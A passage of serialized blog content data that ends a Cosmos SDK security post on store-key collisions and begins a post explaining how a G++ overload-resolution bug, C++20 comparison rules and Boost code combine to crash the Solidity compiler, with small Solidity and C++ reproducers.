names",{"type":26,"tag":137,"props":92181,"children":92182},{"style":5601},[92183],{"type":32,"value":5875},{"type":26,"tag":137,"props":92185,"children":92186},{"class":5559,"line":5642},[92187,92191,92195,92199,92203,92207,92212,92216,92220],{"type":26,"tag":137,"props":92188,"children":92189},{"style":5584},[92190],{"type":32,"value":27923},{"type":26,"tag":137,"props":92192,"children":92193},{"style":5601},[92194],{"type":32,"value":3016},{"type":26,"tag":137,"props":92196,"children":92197},{"style":5584},[92198],{"type":32,"value":51100},{"type":26,"tag":137,"props":92200,"children":92201},{"style":5601},[92202],{"type":32,"value":11247},{"type":26,"tag":137,"props":92204,"children":92205},{"style":5590},[92206],{"type":32,"value":289},{"type":26,"tag":137,"props":92208,"children":92209},{"style":5682},[92210],{"type":32,"value":92211}," NewKVStoreKey",{"type":26,"tag":137,"props":92213,"children":92214},{"style":5601},[92215],{"type":32,"value":165},{"type":26,"tag":137,"props":92217,"children":92218},{"style":5584},[92219],{"type":32,"value":51100},{"type":26,"tag":137,"props":92221,"children":92222},{"style":5601},[92223],{"type":32,"value":5742},{"type":26,"tag":137,"props":92225,"children":92226},{"class":5559,"line":5745},[92227],{"type":26,"tag":137,"props":92228,"children":92229},{"style":5601},[92230],{"type":32,"value":5945},{"type":26,"tag":137,"props":92232,"children":92233},{"class":5559,"line":5850},[92234],{"type":26,"tag":137,"props":92235,"children":92236},{"emptyLinePlaceholder":18},[92237],{"type":32,"value":6276},{"type":26,"tag":137,"props":92239,"children":92240},{"class":5559,"line":5878},[92241,92245],{"type":26,"tag":137,"props":92242,"children":92243},{"style":5610},[92244],{"type":32,"value":19582},{"type":26,"tag":137,"props":92246,"children":92247},{"style":5584},[92248],{"type":32,"value":92249}," keys\n",{"type":26,"tag":137,"props":92251,"children":92252},{"class":5559,"line":5891},[92253],{"type":26,"tag":137,"props":92254,"children":92255},{"style":5601},[92256],{"type":32,"value":6507},{"type":26,"tag":35,"props":92258,"children":92259},{},[92260,92262,92267,92269,92274,92276,92281],{"type":32,"value":92261},"Thanks to the diligence of core developers, checks are now enforced and the ",{"type":26,"tag":130,"props":92263,"children":92265},{"className":92264},[],[92266],{"type":32,"value":81064},{"type":32,"value":92268}," will refuse to run if any ",{"type":26,"tag":130,"props":92270,"children":92272},{"className":92271},[],[92273],{"type":32,"value":87579},{"type":32,"value":92275}," keys are prefix of each other. This implementation alleviates developers from having to worry about key collisions on the ",{"type":26,"tag":130,"props":92277,"children":92279},{"className":92278},[],[92280],{"type":32,"value":87579},{"type":32,"value":92282}," level.",{"type":26,"tag":35,"props":92284,"children":92285},{},[92286,92288,92295],{"type":32,"value":92287},"Additional storage key issues like subtle bugs in the Cosmos-SDK have resulted in ",{"type":26,"tag":41,"props":92289,"children":92292},{"href":92290,"rel":92291},"https://github.com/cosmos/cosmos-sdk/issues/12661",[45],[92293],{"type":32,"value":92294},"incorrect iterator behavior",{"type":32,"value":470},{"type":26,"tag":35,"props":92297,"children":92298},{},[92299,92301,92308],{"type":32,"value":92300},"Notably, gradual adoption of the ",{"type":26,"tag":41,"props":92302,"children":92305},{"href":92303,"rel":92304},"https://github.com/cosmos/cosmos-sdk/tree/def657dafa615cb8e8bb072452663893157e073a/collections",[45],[92306],{"type":32,"value":92307},"collections",{"type":32,"value":92309}," storage helpers since Cosmos v0.50 has made it a lot more difficult to write buggy code. This demonstrates the importance of keeping up to date with the latest SDK development to leverage architectural security improvements.",{"type":26,"tag":92,"props":92311,"children":92312},{"id":31526},[92313],{"type":32,"value":21540},{"type":26,"tag":35,"props":92315,"children":92316},{},[92317],{"type":32,"value":92318},"The Cosmos SDK is a powerful tool for those who want to create custom blockchains. However, this flexibility brings about great responsibility. Developers must pay close attention to nuances, as these can expose a large number of potential attack surfaces.",{"type":26,"tag":35,"props":92320,"children":92321},{},[92322],{"type":32,"value":92323},"To recap, we discussed some of the more basic parts of Cosmos-SDK, showcasing common mistakes developers tend to make. Yet, it is important to note that we've only covered the tip of the iceberg. Other attack surfaces, such as authentications in relation to the IBC interface, are fundamentals absolutely worth looking into.",{"type":26,"tag":7949,"props":92325,"children":92326},{},[92327],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":92329},[92330,92331,92334,92337,92340,92343,92346,92349],{"id":31609,"depth":5412,"text":31612},{"id":78484,"depth":5412,"text":78487,"children":92332},[92333],{"id":79289,"depth":5417,"text":79292},{"id":79884,"depth":5412,"text":79887,"children":92335},[92336],{"id":80533,"depth":5417,"text":79292},{"id":81030,"depth":5412,"text":81033,"children":92338},[92339],{"id":82330,"depth":5417,"text":79292},{"id":83674,"depth":5412,"text":83677,"children":92341},[92342],{"id":84212,"depth":5417,"text":79292},{"id":85731,"depth":5412,"text":85734,"children":92344},[92345],{"id":86611,"depth":5417,"text":79292},{"id":87565,"depth":5412,"text":87568,"children":92347},[92348],{"id":91991,"depth":5417,"text":79292},{"id":31526,"depth":5412,"text":21540},"content:blog:2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security",{"_path":92354,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":92355,"description":92356,"author":92357,"image":92358,"date":92360,"tags":92361,"isFeatured":18,"onBlogPage":18,"body":92362,"_type":5433,"_id":95070,"_source":5435,"_file":95071,"_stem":95072,"_extension":5438},"/blog/2025-08-11-compiler-bug-causes-compiler-bug","Compiler Bug Causes Compiler Bug: How a 12-Year-Old G++ Bug Took Down Solidity","A subtle G++ bug from 2012, C++20's new comparison rules, and legacy Boost code can collide to crash Solidity's compiler on valid code. We unpack the surprising chain reaction and how to fix it.","kiprey",{"src":92359,"height":17,"width":17},"/posts/compiler-bug-causes-compiler-bug/title.png","2025-08-11",[7054,31604],{"type":23,"children":92363,"toc":95054},[92364,92369,92506,92511,92516,92521,92526,92639,92644,92649,92654,92694,92707,92712,92730,92735,92738,92744,92758,92771,92776,92789,92794,92806,92819,92824,92827,92833,92839,92896,92901,92906,92920,92955,92963,92971,92991,92997,93002,93442,93450,93494,93499,93507,93515,93554,93559,93567,93572,93575,93581,93587,93612,93624,93651,93684,93689,93692,93698,93717,94235,94248,94266,94289,94300,94305,94408,94413,94418,94432,94437,94513,94531,94536,94539,94545,94557,94569,94909,94914,94932,94937,94940,94946,94951,94969,94989,94992,94998,95017,95020,95024,95029,95040,95045,95050],{"type":26,"tag":35,"props":92365,"children":92366},{},[92367],{"type":32,"value":92368},"Compilers aren't supposed to crash — especially not when compiling perfectly valid code like this:",{"type":26,"tag":5512,"props":92370,"children":92372},{"code":92371,"language":7054,"meta":7,"className":7055,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n    function a() public pure returns (uint256) {\n        return 1 ** 2;\n    }\n}\n",[92373],{"type":26,"tag":130,"props":92374,"children":92375},{"__ignoreMap":7},[92376,92384,92402,92409,92426,92468,92492,92499],{"type":26,"tag":137,"props":92377,"children":92378},{"class":5559,"line":5560},[92379],{"type":26,"tag":137,"props":92380,"children":92381},{"style":5564},[92382],{"type":32,"value":92383},"// SPDX-License-Identifier: UNLICENSED\n",{"type":26,"tag":137,"props":92385,"children":92386},{"class":5559,"line":5412},[92387,92392,92397],{"type":26,"tag":137,"props":92388,"children":92389},{"style":5610},[92390],{"type":32,"value":92391},"pragma",{"type":26,"tag":137,"props":92393,"children":92394},{"style":5573},[92395],{"type":32,"value":92396}," solidity",{"type":26,"tag":137,"props":92398,"children":92399},{"style":5601},[92400],{"type":32,"value":92401}," ^0.8.25;\n",{"type":26,"tag":137,"props":92403,"children":92404},{"class":5559,"line":5417},[92405],{"type":26,"tag":137,"props":92406,"children":92407},{"emptyLinePlaceholder":18},[92408],{"type":32,"value":6276},{"type":26,"tag":137,"props":92410,"children":92411},{"class":5559,"line":5642},[92412,92417,92422],{"type":26,"tag":137,"props":92413,"children":92414},{"style":5573},[92415],{"type":32,"value":92416},"contract",{"type":26,"tag":137,"props":92418,"children":92419},{"style":6009},[92420],{"type":32,"value":92421}," A",{"type":26,"tag":137,"props":92423,"children":92424},{"style":5601},[92425],{"type":32,"value":5875},{"type":26,"tag":137,"props":92427,"children":92428},{"class":5559,"line":5745},[92429,92434,92439,92443,92447,92452,92456,92460,92464],{"type":26,"tag":137,"props":92430,"children":92431},{"style":5573},[92432],{"type":32,"value":92433},"    function",{"type":26,"tag":137,"props":92435,"children":92436},{"style":5682},[92437],{"type":32,"value":92438}," a",{"type":26,"tag":137,"props":92440,"children":92441},{"style":5601},[92442],{"type":32,"value":16634},{"type":26,"tag":137,"props":92444,"children":92445},{"style":5573},[92446],{"type":32,"value":64276},{"type":26,"tag":137,"props":92448,"children":92449},{"style":5573},[92450],{"type":32,"value":92451}," pure",{"type":26,"tag":137,"props":92453,"children":92454},{"style":5610},[92455],{"type":32,"value":78596},{"type":26,"tag":137,"props":92457,"children":92458},{"style":5601},[92459],{"type":32,"value":4625},{"type":26,"tag":137,"props":92461,"children":92462},{"style":6009},[92463],{"type":32,"value":48770},{"type":26,"tag":137,"props":92465,"children":92466},{"style":5601},[92467],{"type":32,"value":17395},{"type":26,"tag":137,"props":92469,"children":92470},{"class":5559,"line":5850},[92471,92475,92479,92484,92488],{"type":26,"tag":137,"props":92472,"children":92473},{"style":5610},[92474],{"type":32,"value":18336},{"type":26,"tag":137,"props":92476,"children":92477},{"style":5626},[92478],{"type":32,"value":7104},{"type":26,"tag":137,"props":92480,"children":92481},{"style":5590},[92482],{"type":32,"value":92483}," **",{"type":26,"tag":137,"props":92485,"children":92486},{"style":5626},[92487],{"type":32,"value":10519},{"type":26,"tag":137,"props":92489,"children":92490},{"style":5601},[92491],{"type":32,"value":5604},{"type":26,"tag":137,"props":92493,"children":92494},{"class":5559,"line":5878},[92495],{"type":26,"tag":137,"props":92496,"children":92497},{"style":5601},[92498],{"type":32,"value":5945},{"type":26,"tag":137,"props":92500,"children":92501},{"class":5559,"line":5891},[92502],{"type":26,"tag":137,"props":92503,"children":92504},{"style":5601},[92505],{"type":32,"value":6507},{"type":26,"tag":35,"props":92507,"children":92508},{},[92509],{"type":32,"value":92510},"Yet running Solidity's compiler (solc) on this file on a standard Ubuntu 22.04 system (G++ 11.4, Boost 1.74) causes an immediate segmentation fault.",{"type":26,"tag":35,"props":92512,"children":92513},{},[92514],{"type":32,"value":92515},"At first, this seemed absurd. The code just returns 1 to the power of 2 — no memory tricks, unsafe casting, or undefined behavior.",{"type":26,"tag":35,"props":92517,"children":92518},{},[92519],{"type":32,"value":92520},"And yet, it crashes.",{"type":26,"tag":35,"props":92522,"children":92523},{},[92524],{"type":32,"value":92525},"Another minimal example?",{"type":26,"tag":5512,"props":92527,"children":92529},{"code":92528,"language":7054,"meta":7,"className":7055,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n    function a() public pure {\n        uint256[1] data;\n    }\n}\n",[92530],{"type":26,"tag":130,"props":92531,"children":92532},{"__ignoreMap":7},[92533,92540,92555,92562,92577,92604,92625,92632],{"type":26,"tag":137,"props":92534,"children":92535},{"class":5559,"line":5560},[92536],{"type":26,"tag":137,"props":92537,"children":92538},{"style":5564},[92539],{"type":32,"value":92383},{"type":26,"tag":137,"props":92541,"children":92542},{"class":5559,"line":5412},[92543,92547,92551],{"type":26,"tag":137,"props":92544,"children":92545},{"style":5610},[92546],{"type":32,"value":92391},{"type":26,"tag":137,"props":92548,"children":92549},{"style":5573},[92550],{"type":32,"value":92396},{"type":26,"tag":137,"props":92552,"children":92553},{"style":5601},[92554],{"type":32,"value":92401},{"type":26,"tag":137,"props":92556,"children":92557},{"class":5559,"line":5417},[92558],{"type":26,"tag":137,"props":92559,"children":92560},{"emptyLinePlaceholder":18},[92561],{"type":32,"value":6276},{"type":26,"tag":137,"props":92563,"children":92564},{"class":5559,"line":5642},[92565,92569,92573],{"type":26,"tag":137,"props":92566,"children":92567},{"style":5573},[92568],{"type":32,"value":92416},{"type":26,"tag":137,"props":92570,"children":92571},{"style":6009},[92572],{"type":32,"value":92421},{"type":26,"tag":137,"props":92574,"children":92575},{"style":5601},[92576],{"type":32,"value":5875},{"type":26,"tag":137,"props":92578,"children":92579},{"class":5559,"line":5745},[92580,92584,92588,92592,92596,92600],{"type":26,"tag":137,"props":92581,"children":92582},{"style":5573},[92583],{"type":32,"value":92433},{"type":26,"tag":137,"props":92585,"children":92586},{"style":5682},[92587],{"type":32,"value":92438},{"type":26,"tag":137,"props":92589,"children":92590},{"style":5601},[92591],{"type":32,"value":16634},{"type":26,"tag":137,"props":92593,"children":92594},{"style":5573},[92595],{"type":32,"value":64276},{"type":26,"tag":137,"props":92597,"children":92598},{"style":5573},[92599],{"type":32,"value":92451},{"type":26,"tag":137,"props":92601,"children":92602},{"style":5601},[92603],{"type":32,"value":5875},{"type":26,"tag":137,"props":92605,"children":92606},{"class":5559,"line":5850},[92607,92612,92616,92620],{"type":26,"tag":137,"props":92608,"children":92609},{"style":6009},[92610],{"type":32,"value":92611},"        uint256",{"type":26,"tag":137,"props":92613,"children":92614},{"style":5601},[92615],{"type":32,"value":3016},{"type":26,"tag":137,"props":92617,"children":92618},{"style":5626},[92619],{"type":32,"value":878},{"type":26,"tag":137,"props":92621,"children":92622},{"style":5601},[92623],{"type":32,"value":92624},"] data;\n",{"type":26,"tag":137,"props":92626,"children":92627},{"class":5559,"line":5878},[92628],{"type":26,"tag":137,"props":92629,"children":92630},{"style":5601},[92631],{"type":32,"value":5945},{"type":26,"tag":137,"props":92633,"children":92634},{"class":5559,"line":5891},[92635],{"type":26,"tag":137,"props":92636,"children":92637},{"style":5601},[92638],{"type":32,"value":6507},{"type":26,"tag":35,"props":92640,"children":92641},{},[92642],{"type":32,"value":92643},"Still crashes.",{"type":26,"tag":35,"props":92645,"children":92646},{},[92647],{"type":32,"value":92648},"So what’s going on?",{"type":26,"tag":35,"props":92650,"children":92651},{},[92652],{"type":32,"value":92653},"We traced it down to a seemingly unrelated C++ line deep in the compiler backend:",{"type":26,"tag":5512,"props":92655,"children":92657},{"code":92656,"language":31706,"meta":7,"className":31704,"style":7},"if (*lengthValue == 0) { ... }\n",[92658],{"type":26,"tag":130,"props":92659,"children":92660},{"__ignoreMap":7},[92661],{"type":26,"tag":137,"props":92662,"children":92663},{"class":5559,"line":5560},[92664,92668,92672,92676,92681,92685,92689],{"type":26,"tag":137,"props":92665,"children":92666},{"style":5610},[92667],{"type":32,"value":18171},{"type":26,"tag":137,"props":92669,"children":92670},{"style":5601},[92671],{"type":32,"value":4625},{"type":26,"tag":137,"props":92673,"children":92674},{"style":5590},[92675],{"type":32,"value":7152},{"type":26,"tag":137,"props":92677,"children":92678},{"style":5601},[92679],{"type":32,"value":92680},"lengthValue ",{"type":26,"tag":137,"props":92682,"children":92683},{"style":5590},[92684],{"type":32,"value":11161},{"type":26,"tag":137,"props":92686,"children":92687},{"style":5626},[92688],{"type":32,"value":5629},{"type":26,"tag":137,"props":92690,"children":92691},{"style":5601},[92692],{"type":32,"value":92693},") { ... }\n",{"type":26,"tag":35,"props":92695,"children":92696},{},[92697,92699,92705],{"type":32,"value":92698},"That single comparison — a ",{"type":26,"tag":130,"props":92700,"children":92702},{"className":92701},[],[92703],{"type":32,"value":92704},"boost::rational",{"type":32,"value":92706}," compared to 0 — causes infinite recursion in G++ \u003C 14 when compiled under C++20. And the resulting stack overflow crashes solc.",{"type":26,"tag":35,"props":92708,"children":92709},{},[92710],{"type":32,"value":92711},"This post unpacks how this happened — and why none of the individual components are technically \"broken\":",{"type":26,"tag":3426,"props":92713,"children":92714},{},[92715,92720,92725],{"type":26,"tag":3430,"props":92716,"children":92717},{},[92718],{"type":32,"value":92719},"A 12-year-old overload resolution bug in G++",{"type":26,"tag":3430,"props":92721,"children":92722},{},[92723],{"type":32,"value":92724},"An outdated symmetric comparison pattern in Boost",{"type":26,"tag":3430,"props":92726,"children":92727},{},[92728],{"type":32,"value":92729},"A subtle but impactful rewrite rule in C++20",{"type":26,"tag":35,"props":92731,"children":92732},{},[92733],{"type":32,"value":92734},"Put together, they form a perfect storm — one that takes down Solidity compilation on default Linux setups, even though your code is perfectly fine.",{"type":26,"tag":3265,"props":92736,"children":92737},{},[],{"type":26,"tag":92,"props":92739,"children":92741},{"id":92740},"background-the-setup",[92742],{"type":32,"value":92743},"Background: The Setup",{"type":26,"tag":35,"props":92745,"children":92746},{},[92747,92749,92756],{"type":32,"value":92748},"If you follow the ",{"type":26,"tag":41,"props":92750,"children":92753},{"href":92751,"rel":92752},"https://docs.soliditylang.org/en/v0.8.30/installing-solidity.html#building-from-source",[45],[92754],{"type":32,"value":92755},"Solidity build documentation (v0.8.30)",{"type":32,"value":92757},", you'll see it recommends:",{"type":26,"tag":3426,"props":92759,"children":92760},{},[92761,92766],{"type":26,"tag":3430,"props":92762,"children":92763},{},[92764],{"type":32,"value":92765},"Boost ≥ 1.67",{"type":26,"tag":3430,"props":92767,"children":92768},{},[92769],{"type":32,"value":92770},"GCC ≥ 11",{"type":26,"tag":35,"props":92772,"children":92773},{},[92774],{"type":32,"value":92775},"Ubuntu 22.04, for example, ships with:",{"type":26,"tag":3426,"props":92777,"children":92778},{},[92779,92784],{"type":26,"tag":3430,"props":92780,"children":92781},{},[92782],{"type":32,"value":92783},"G++ 11.4.0",{"type":26,"tag":3430,"props":92785,"children":92786},{},[92787],{"type":32,"value":92788},"Boost 1.74.0",{"type":26,"tag":35,"props":92790,"children":92791},{},[92792],{"type":32,"value":92793},"So far, so good.",{"type":26,"tag":35,"props":92795,"children":92796},{},[92797,92799,92804],{"type":32,"value":92798},"However, Solidity enabled ",{"type":26,"tag":84,"props":92800,"children":92801},{},[92802],{"type":32,"value":92803},"C++20",{"type":32,"value":92805}," in January 2025:",{"type":26,"tag":5503,"props":92807,"children":92808},{},[92809],{"type":26,"tag":35,"props":92810,"children":92811},{},[92812],{"type":26,"tag":41,"props":92813,"children":92816},{"href":92814,"rel":92815},"https://github.com/ethereum/solidity/commit/233a5081835a04939ccf85dfb5286c0b53d23c66",[45],[92817],{"type":32,"value":92818},"Enable C++20 in Solidity",{"type":26,"tag":35,"props":92820,"children":92821},{},[92822],{"type":32,"value":92823},"This wasn't accompanied by an update to the versions of dependencies in the documentation. As we'll soon see, that's what opened the trapdoor.",{"type":26,"tag":3265,"props":92825,"children":92826},{},[],{"type":26,"tag":92,"props":92828,"children":92830},{"id":92829},"part-i-a-12-year-old-g-bug-in-overload-resolution",[92831],{"type":32,"value":92832},"Part I: A 12-Year-Old G++ Bug in Overload Resolution",{"type":26,"tag":118,"props":92834,"children":92836},{"id":92835},"whats-overload-resolution",[92837],{"type":32,"value":92838},"What’s Overload Resolution?",{"type":26,"tag":35,"props":92840,"children":92841},{},[92842,92844,92850,92852,92858,92860,92865,92867,92872,92874,92880,92882,92887,92888,92894],{"type":32,"value":92843},"In C++, when you write an expression like ",{"type":26,"tag":130,"props":92845,"children":92847},{"className":92846},[],[92848],{"type":32,"value":92849},"a == b",{"type":32,"value":92851},", the compiler chooses among available ",{"type":26,"tag":130,"props":92853,"children":92855},{"className":92854},[],[92856],{"type":32,"value":92857},"operator==",{"type":32,"value":92859}," implementations by comparing their ",{"type":26,"tag":84,"props":92861,"children":92862},{},[92863],{"type":32,"value":92864},"match quality",{"type":32,"value":92866},". A ",{"type":26,"tag":84,"props":92868,"children":92869},{},[92870],{"type":32,"value":92871},"member function",{"type":32,"value":92873}," like ",{"type":26,"tag":130,"props":92875,"children":92877},{"className":92876},[],[92878],{"type":32,"value":92879},"a.operator==(b)",{"type":32,"value":92881}," usually has higher priority than a ",{"type":26,"tag":84,"props":92883,"children":92884},{},[92885],{"type":32,"value":92886},"non-member function",{"type":32,"value":92873},{"type":26,"tag":130,"props":92889,"children":92891},{"className":92890},[],[92892],{"type":32,"value":92893},"operator==(a, b)",{"type":32,"value":92895}," — unless the types differ too much or are ambiguous.",{"type":26,"tag":35,"props":92897,"children":92898},{},[92899],{"type":32,"value":92900},"That’s the rule. But G++ didn’t always follow it.",{"type":26,"tag":118,"props":92902,"children":92903},{"id":4058},[92904],{"type":32,"value":92905},"The Bug",{"type":26,"tag":35,"props":92907,"children":92908},{},[92909,92911,92918],{"type":32,"value":92910},"In 2012, a bug was filed: ",{"type":26,"tag":41,"props":92912,"children":92915},{"href":92913,"rel":92914},"https://gcc.gnu.org/bugzilla/show_bug.cgi?id=53499",[45],[92916],{"type":32,"value":92917},"GCC Bug 53499 – overload resolution favors non-member function",{"type":32,"value":92919},". The issue? In expressions where:",{"type":26,"tag":3426,"props":92921,"children":92922},{},[92923,92943],{"type":26,"tag":3430,"props":92924,"children":92925},{},[92926,92928,92934,92936,92941],{"type":32,"value":92927},"A class ",{"type":26,"tag":130,"props":92929,"children":92931},{"className":92930},[],[92932],{"type":32,"value":92933},"rational\u003CT>",{"type":32,"value":92935}," has a templated ",{"type":26,"tag":130,"props":92937,"children":92939},{"className":92938},[],[92940],{"type":32,"value":92857},{"type":32,"value":92942}," member function",{"type":26,"tag":3430,"props":92944,"children":92945},{},[92946,92948,92954],{"type":32,"value":92947},"There's also a more generic free ",{"type":26,"tag":130,"props":92949,"children":92951},{"className":92950},[],[92952],{"type":32,"value":92953},"operator==(rational\u003CT>, U)",{"type":32,"value":40810},{"type":26,"tag":35,"props":92956,"children":92957},{},[92958],{"type":26,"tag":84,"props":92959,"children":92960},{},[92961],{"type":32,"value":92962},"Clang correctly chooses the member function.",{"type":26,"tag":35,"props":92964,"children":92965},{},[92966],{"type":26,"tag":84,"props":92967,"children":92968},{},[92969],{"type":32,"value":92970},"G++ (before v14) chooses the non-member function.",{"type":26,"tag":35,"props":92972,"children":92973},{},[92974,92976,92981,92983,92990],{"type":32,"value":92975},"Why? Because G++ mishandles ",{"type":26,"tag":84,"props":92977,"children":92978},{},[92979],{"type":32,"value":92980},"templated conversion + non-exact match",{"type":32,"value":92982},", overvaluing a non-member function with worse match quality. It does not correctly apply the overload resolution ranking rules defined in ",{"type":26,"tag":41,"props":92984,"children":92987},{"href":92985,"rel":92986},"https://cplusplus.github.io/CWG/issues/532.html",[45],[92988],{"type":32,"value":92989},"CWG532: Member/nonmember operator template partial ordering",{"type":32,"value":470},{"type":26,"tag":118,"props":92992,"children":92994},{"id":92993},"a-minimal-reproducer",[92995],{"type":32,"value":92996},"A Minimal Reproducer",{"type":26,"tag":35,"props":92998,"children":92999},{},[93000],{"type":32,"value":93001},"Let’s see this in action:",{"type":26,"tag":5512,"props":93003,"children":93005},{"code":93004,"language":31706,"meta":7,"className":31704,"style":7},"#include \u003Ciostream>\n\ntemplate \u003Ctypename IntType>\nclass rational {\npublic:\n    template \u003Cclass T>\n    bool operator==(const T& i) const {\n        std::cout \u003C\u003C \"clang++ resolved member\" \u003C\u003C std::endl;\n        return true;\n    }\n};\n\ntemplate \u003Cclass Arg, class IntType>\nbool operator==(const rational\u003CIntType>& a, const Arg& b) {\n    std::cout \u003C\u003C \"g++ \u003C14 resolved non-member\" \u003C\u003C std::endl;\n    return false;\n}\n\nint main() {\n    rational\u003Cint> r;\n    return r == 0;\n}\n",[93006],{"type":26,"tag":130,"props":93007,"children":93008},{"__ignoreMap":7},[93009,93022,93029,93054,93070,93078,93102,93147,93175,93190,93197,93204,93211,93247,93316,93341,93356,93363,93370,93386,93411,93435],{"type":26,"tag":137,"props":93010,"children":93011},{"class":5559,"line":5560},[93012,93017],{"type":26,"tag":137,"props":93013,"children":93014},{"style":5610},[93015],{"type":32,"value":93016},"#include",{"type":26,"tag":137,"props":93018,"children":93019},{"style":6837},[93020],{"type":32,"value":93021}," \u003Ciostream>\n",{"type":26,"tag":137,"props":93023,"children":93024},{"class":5559,"line":5412},[93025],{"type":26,"tag":137,"props":93026,"children":93027},{"emptyLinePlaceholder":18},[93028],{"type":32,"value":6276},{"type":26,"tag":137,"props":93030,"children":93031},{"class":5559,"line":5417},[93032,93036,93040,93045,93050],{"type":26,"tag":137,"props":93033,"children":93034},{"style":5573},[93035],{"type":32,"value":68817},{"type":26,"tag":137,"props":93037,"children":93038},{"style":5601},[93039],{"type":32,"value":11305},{"type":26,"tag":137,"props":93041,"children":93042},{"style":5573},[93043],{"type":32,"value":93044},"typename",{"type":26,"tag":137,"props":93046,"children":93047},{"style":6009},[93048],{"type":32,"value":93049}," IntType",{"type":26,"tag":137,"props":93051,"children":93052},{"style":5601},[93053],{"type":32,"value":8577},{"type":26,"tag":137,"props":93055,"children":93056},{"class":5559,"line":5642},[93057,93061,93066],{"type":26,"tag":137,"props":93058,"children":93059},{"style":5573},[93060],{"type":32,"value":73012},{"type":26,"tag":137,"props":93062,"children":93063},{"style":6009},[93064],{"type":32,"value":93065}," rational",{"type":26,"tag":137,"props":93067,"children":93068},{"style":5601},[93069],{"type":32,"value":5875},{"type":26,"tag":137,"props":93071,"children":93072},{"class":5559,"line":5745},[93073],{"type":26,"tag":137,"props":93074,"children":93075},{"style":5573},[93076],{"type":32,"value":93077},"public:\n",{"type":26,"tag":137,"props":93079,"children":93080},{"class":5559,"line":5850},[93081,93086,93090,93094,93098],{"type":26,"tag":137,"props":93082,"children":93083},{"style":5573},[93084],{"type":32,"value":93085},"    template",{"type":26,"tag":137,"props":93087,"children":93088},{"style":5601},[93089],{"type":32,"value":11305},{"type":26,"tag":137,"props":93091,"children":93092},{"style":5573},[93093],{"type":32,"value":73012},{"type":26,"tag":137,"props":93095,"children":93096},{"style":6009},[93097],{"type":32,"value":8504},{"type":26,"tag":137,"props":93099,"children":93100},{"style":5601},[93101],{"type":32,"value":8577},{"type":26,"tag":137,"props":93103,"children":93104},{"class":5559,"line":5878},[93105,93109,93114,93119,93123,93127,93131,93135,93139,93143],{"type":26,"tag":137,"props":93106,"children":93107},{"style":5573},[93108],{"type":32,"value":49075},{"type":26,"tag":137,"props":93110,"children":93111},{"style":5573},[93112],{"type":32,"value":93113}," operator",{"type":26,"tag":137,"props":93115,"children":93116},{"style":5601},[93117],{"type":32,"value":93118},"==(",{"type":26,"tag":137,"props":93120,"children":93121},{"style":5573},[93122],{"type":32,"value":12244},{"type":26,"tag":137,"props":93124,"children":93125},{"style":6009},[93126],{"type":32,"value":8504},{"type":26,"tag":137,"props":93128,"children":93129},{"style":5573},[93130],{"type":32,"value":5694},{"type":26,"tag":137,"props":93132,"children":93133},{"style":5584},[93134],{"type":32,"value":5988},{"type":26,"tag":137,"props":93136,"children":93137},{"style":5601},[93138],{"type":32,"value":5671},{"type":26,"tag":137,"props":93140,"children":93141},{"style":5573},[93142],{"type":32,"value":12244},{"type":26,"tag":137,"props":93144,"children":93145},{"style":5601},[93146],{"type":32,"value":5875},{"type":26,"tag":137,"props":93148,"children":93149},{"class":5559,"line":5891},[93150,93155,93160,93165,93170],{"type":26,"tag":137,"props":93151,"children":93152},{"style":5601},[93153],{"type":32,"value":93154},"        std::cout ",{"type":26,"tag":137,"props":93156,"children":93157},{"style":5590},[93158],{"type":32,"value":93159},"\u003C\u003C",{"type":26,"tag":137,"props":93161,"children":93162},{"style":6837},[93163],{"type":32,"value":93164}," \"clang++ resolved member\"",{"type":26,"tag":137,"props":93166,"children":93167},{"style":5590},[93168],{"type":32,"value":93169}," \u003C\u003C",{"type":26,"tag":137,"props":93171,"children":93172},{"style":5601},[93173],{"type":32,"value":93174}," std::endl;\n",{"type":26,"tag":137,"props":93176,"children":93177},{"class":5559,"line":5909},[93178,93182,93186],{"type":26,"tag":137,"props":93179,"children":93180},{"style":5610},[93181],{"type":32,"value":18336},{"type":26,"tag":137,"props":93183,"children":93184},{"style":5573},[93185],{"type":32,"value":15060},{"type":26,"tag":137,"props":93187,"children":93188},{"style":5601},[93189],{"type":32,"value":5604},{"type":26,"tag":137,"props":93191,"children":93192},{"class":5559,"line":5930},[93193],{"type":26,"tag":137,"props":93194,"children":93195},{"style":5601},[93196],{"type":32,"value":5945},{"type":26,"tag":137,"props":93198,"children":93199},{"class":5559,"line":5939},[93200],{"type":26,"tag":137,"props":93201,"children":93202},{"style":5601},[93203],{"type":32,"value":19170},{"type":26,"tag":137,"props":93205,"children":93206},{"class":5559,"line":6191},[93207],{"type":26,"tag":137,"props":93208,"children":93209},{"emptyLinePlaceholder":18},[93210],{"type":32,"value":6276},{"type":26,"tag":137,"props":93212,"children":93213},{"class":5559,"line":6208},[93214,93218,93222,93226,93231,93235,93239,93243],{"type":26,"tag":137,"props":93215,"children":93216},{"style":5573},[93217],{"type":32,"value":68817},{"type":26,"tag":137,"props":93219,"children":93220},{"style":5601},[93221],{"type":32,"value":11305},{"type":26,"tag":137,"props":93223,"children":93224},{"style":5573},[93225],{"type":32,"value":73012},{"type":26,"tag":137,"props":93227,"children":93228},{"style":6009},[93229],{"type":32,"value":93230}," Arg",{"type":26,"tag":137,"props":93232,"children":93233},{"style":5601},[93234],{"type":32,"value":1108},{"type":26,"tag":137,"props":93236,"children":93237},{"style":5573},[93238],{"type":32,"value":73012},{"type":26,"tag":137,"props":93240,"children":93241},{"style":6009},[93242],{"type":32,"value":93049},{"type":26,"tag":137,"props":93244,"children":93245},{"style":5601},[93246],{"type":32,"value":8577},{"type":26,"tag":137,"props":93248,"children":93249},{"class":5559,"line":6225},[93250,93254,93258,93262,93266,93270,93274,93279,93283,93287,93291,93295,93299,93303,93307,93312],{"type":26,"tag":137,"props":93251,"children":93252},{"style":5573},[93253],{"type":32,"value":32279},{"type":26,"tag":137,"props":93255,"children":93256},{"style":5573},[93257],{"type":32,"value":93113},{"type":26,"tag":137,"props":93259,"children":93260},{"style":5601},[93261],{"type":32,"value":93118},{"type":26,"tag":137,"props":93263,"children":93264},{"style":5573},[93265],{"type":32,"value":12244},{"type":26,"tag":137,"props":93267,"children":93268},{"style":6009},[93269],{"type":32,"value":93065},{